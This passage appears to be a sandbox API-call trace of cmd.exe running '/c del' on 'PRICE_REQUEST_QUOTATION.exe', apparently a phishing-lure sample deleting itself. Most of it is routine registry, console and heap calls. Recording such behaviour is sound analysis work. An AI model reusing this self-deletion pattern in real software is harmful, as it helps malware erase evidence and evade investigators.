_Argc=0xba60e8, _Argv=0xba60ec, _Env=0xba60f0) returned 0 [0123.374] GetCurrentThreadId () returned 0x188 [0123.374] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x188) returned 0x84 [0123.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0123.375] GetProcAddress (hModule=0x74530000, lpProcName="SetThreadUILanguage") returned 0x74572510 [0123.375] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.380] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0123.380] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0123.380] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0123.380] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0123.380] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0123.380] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0123.380] GetConsoleOutputCP () returned 0x1b5 [0123.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbaf460 | out: lpCPInfo=0xbaf460) returned 1 [0123.381] SetConsoleCtrlHandler (HandlerRoutine=0xba0e40, Add=1) returned 1 [0123.381] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.381] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0123.381] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.381] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbaf40c | out: lpMode=0xbaf40c) returned 1 [0123.382] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.382] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0123.382] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.382] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xbaf408 | out: lpMode=0xbaf408) returned 1 [0123.382] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.382] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0123.382] GetEnvironmentStringsW () returned 0x607ed8* [0123.382] GetProcessHeap () returned 0x600000 [0123.382] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb04) returned 0x6089e8 [0123.383] FreeEnvironmentStringsA (penv="=") returned 1 [0123.383] GetProcessHeap () returned 0x600000 [0123.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4) returned 0x600550 [0123.383] GetEnvironmentStringsW () returned 0x607ed8* [0123.383] GetProcessHeap () returned 0x600000 [0123.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb04) returned 0x6094f8 [0123.383] FreeEnvironmentStringsA (penv="=") returned 1 [0123.383] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.383] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.384] RegCloseKey (hKey=0x94) returned 0x0 [0123.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0123.384] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0123.384] RegCloseKey (hKey=0x94) returned 0x0 [0123.384] time (in: timer=0x0 | out: timer=0x0) returned 0x6152bcdf [0123.384] srand (_Seed=0x6152bcdf) [0123.384] GetCommandLineW () returned="/c del \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\"" [0123.384] GetCommandLineW () returned="/c del \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\"" [0123.384] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbb7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.385] GetProcessHeap () returned 0x600000 [0123.385] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x210) returned 0x607ed8 [0123.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x607ee0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0123.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xbaf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0123.385] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xbaf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0123.385] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xbaf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0123.385] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0123.385] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0123.385] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0123.385] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0123.385] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0123.385] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0123.385] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0123.386] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0123.386] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0123.386] GetProcessHeap () returned 0x600000 [0123.386] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x6089e8) returned 1 [0123.386] GetEnvironmentStringsW () returned 0x6080f0* [0123.386] GetProcessHeap () returned 0x600000 [0123.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb1c) returned 0x60ab30 [0123.386] FreeEnvironmentStringsA (penv="=") returned 1 [0123.386] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xbaf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0123.386] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xbaf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0123.386] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0123.386] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0123.386] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0123.386] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0123.386] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0123.386] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0123.386] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0123.386] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0123.386] GetProcessHeap () returned 0x600000 [0123.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x60b658 [0123.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x19fc4c*="system32") returned 0x13 [0123.387] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0123.387] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x60b690 [0123.387] FindClose (in: hFindFile=0x60b690 | out: hFindFile=0x60b690) returned 1 [0123.387] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x60b690 [0123.387] FindClose (in: hFindFile=0x60b690 | out: hFindFile=0x60b690) returned 1 [0123.387] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0123.387] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0123.387] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0123.387] GetProcessHeap () returned 0x600000 [0123.388] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x60ab30) returned 1 [0123.388] GetEnvironmentStringsW () returned 0x60a008* [0123.388] GetProcessHeap () returned 0x600000 [0123.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb4c) returned 0x60b690 [0123.388] FreeEnvironmentStringsA (penv="=") returned 1 [0123.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbb7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.388] GetProcessHeap () returned 0x600000 [0123.388] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x60b658) returned 1 [0123.388] GetProcessHeap () returned 0x600000 [0123.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400e) returned 0x60c1e8 [0123.388] GetProcessHeap () returned 0x600000 [0123.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x8c) returned 0x608c48 [0123.388] GetProcessHeap () returned 0x600000 [0123.388] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x60c1e8) returned 1 [0123.388] GetConsoleOutputCP () returned 0x1b5 [0123.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbaf460 | out: lpCPInfo=0xbaf460) returned 1 [0123.389] GetUserDefaultLCID () returned 0x409 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xbb34a0, cchData=8 | out: lpLCData=":") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xbb34b0, cchData=8 | out: lpLCData="/") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xbb3500, cchData=32 | out: lpLCData="Mon") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xbb3540, cchData=32 | out: lpLCData="Tue") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xbb3580, cchData=32 | out: lpLCData="Wed") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xbb35c0, cchData=32 | out: lpLCData="Thu") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xbb3600, cchData=32 | out: lpLCData="Fri") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xbb3640, cchData=32 | out: lpLCData="Sat") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xbb3680, cchData=32 | out: lpLCData="Sun") returned 4 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xbb34c0, cchData=8 | out: lpLCData=".") returned 2 [0123.389] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xbb34e0, cchData=8 | out: lpLCData=",") returned 2 [0123.390] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0123.391] GetProcessHeap () returned 0x600000 [0123.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20c) returned 0x608d28 [0123.391] GetConsoleTitleW (in: lpConsoleTitle=0x608d28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0123.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0123.391] GetProcAddress (hModule=0x74530000, lpProcName="CopyFileExW") returned 0x7454ffc0 [0123.391] GetProcAddress (hModule=0x74530000, lpProcName="IsDebuggerPresent") returned 0x7454b0b0 [0123.391] GetProcAddress (hModule=0x74530000, lpProcName="SetConsoleInputExeNameW") returned 0x76d3b440 [0123.392] GetProcessHeap () returned 0x600000 [0123.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400a) returned 0x60c1e8 [0123.392] GetProcessHeap () returned 0x600000 [0123.392] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x60c1e8) returned 1 [0123.392] _wcsicmp (_String1="del", _String2=")") returned 59 [0123.392] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0123.392] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0123.392] _wcsicmp (_String1="IF", _String2="del") returned 5 [0123.392] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0123.392] _wcsicmp (_String1="REM", _String2="del") returned 14 [0123.392] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0123.392] GetProcessHeap () returned 0x600000 [0123.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x608f40 [0123.392] GetProcessHeap () returned 0x600000 [0123.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10) returned 0x600578 [0123.394] GetProcessHeap () returned 0x600000 [0123.394] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x82) returned 0x608fa0 [0123.394] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0123.395] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0123.395] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0123.395] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0123.395] GetProcessHeap () returned 0x600000 [0123.395] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xfc) returned 0x609030 [0123.395] GetProcessHeap () returned 0x600000 [0123.395] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x609030, Size=0x82) returned 0x609030 [0123.395] GetProcessHeap () returned 0x600000 [0123.395] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x609030) returned 0x82 [0123.395] GetProcessHeap () returned 0x600000 [0123.395] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x8a) returned 0x6090c0 [0123.396] GetProcessHeap () returned 0x600000 [0123.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xfc) returned 0x609158 [0123.396] GetProcessHeap () returned 0x600000 [0123.396] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x609158, Size=0x82) returned 0x609158 [0123.396] GetProcessHeap () returned 0x600000 [0123.396] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x609158) returned 0x82 [0123.396] GetProcessHeap () returned 0x600000 [0123.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x7c) returned 0x6091e8 [0123.396] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f818 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.396] GetProcessHeap () returned 0x600000 [0123.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x38) returned 0x609270 [0123.396] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e888 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.396] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19eac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0123.396] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0123.396] GetProcessHeap () returned 0x600000 [0123.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2c) returned 0x6092b0 [0123.397] GetProcessHeap () returned 0x600000 [0123.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x258) returned 0x6005c8 [0123.397] _wcsicmp (_String1="PRICE_REQUEST_QUOTATION.exe", _String2=".") returned 66 [0123.397] _wcsicmp (_String1="PRICE_REQUEST_QUOTATION.exe", _String2="..") returned 66 [0123.397] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x20 [0123.397] GetProcessHeap () returned 0x600000 [0123.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x210) returned 0x600828 [0123.397] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x600830 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.397] SetErrorMode (uMode=0x0) returned 0x1 [0123.397] SetErrorMode (uMode=0x1) returned 0x0 [0123.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", nBufferLength=0x104, lpBuffer=0x19eee8, lpFilePart=0x19eebc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", lpFilePart=0x19eebc*="PRICE_REQUEST_QUOTATION.exe") returned 0x39 [0123.397] SetErrorMode (uMode=0x1) returned 0x1 [0123.397] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0123.397] GetProcessHeap () returned 0x600000 [0123.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x258) returned 0x600a40 [0123.397] _wcsicmp (_String1="PRICE_REQUEST_QUOTATION.exe", _String2=".") returned 66 [0123.397] _wcsicmp (_String1="PRICE_REQUEST_QUOTATION.exe", _String2="..") returned 66 [0123.397] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x20 [0123.398] GetProcessHeap () returned 0x600000 [0123.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x40) returned 0x6092e8 [0123.398] GetProcessHeap () returned 0x600000 [0123.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x44) returned 0x609330 [0123.398] GetProcessHeap () returned 0x600000 [0123.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x44) returned 0x609380 [0123.398] GetProcessHeap () returned 0x600000 [0123.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x808) returned 0x60a008 [0123.398] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", fInfoLevelId=0x0, lpFindFileData=0x60a014, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60a014) returned 0x6093d0 [0123.398] GetProcessHeap () returned 0x600000 [0123.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x607660 [0123.398] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0123.398] NtOpenFile (in: FileHandle=0x19edbc, DesiredAccess=0x10000, ObjectAttributes=0x19ed84*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19edac, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19edbc*=0xa4, IoStatusBlock=0x19edac*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0123.399] RtlReleaseRelativeName () returned 0x19ed9c [0123.399] RtlFreeAnsiString (AnsiString="\\") [0123.399] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x19ece8, FsInformation=0x19ecf0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x19ece8, FsInformation=0x19ecf0) returned 0x0 [0123.399] CloseHandle (hObject=0xa4) returned 1 [0123.403] FindNextFileW (in: hFindFile=0x6093d0, lpFindFileData=0x60a014 | out: lpFindFileData=0x60a014*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fcf000, ftCreationTime.dwHighDateTime=0x1d7b435, ftLastAccessTime.dwLowDateTime=0xd1fcf000, ftLastAccessTime.dwHighDateTime=0x1d7b435, ftLastWriteTime.dwLowDateTime=0xf8297e00, ftLastWriteTime.dwHighDateTime=0x1d7b3aa, nFileSizeHigh=0x0, nFileSizeLow=0x41365, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRICE_REQUEST_QUOTATION.exe", cAlternateFileName="PRICE_~1.EXE")) returned 0 [0123.404] GetLastError () returned 0x12 [0123.404] FindClose (in: hFindFile=0x6093d0 | out: hFindFile=0x6093d0) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x60a008) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x609380) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x6092e8) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x609330) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x600a40) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x600828) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x6005c8) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x6092b0) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x609270) returned 1 [0123.405] GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x6091e8) returned 1 [0123.405] 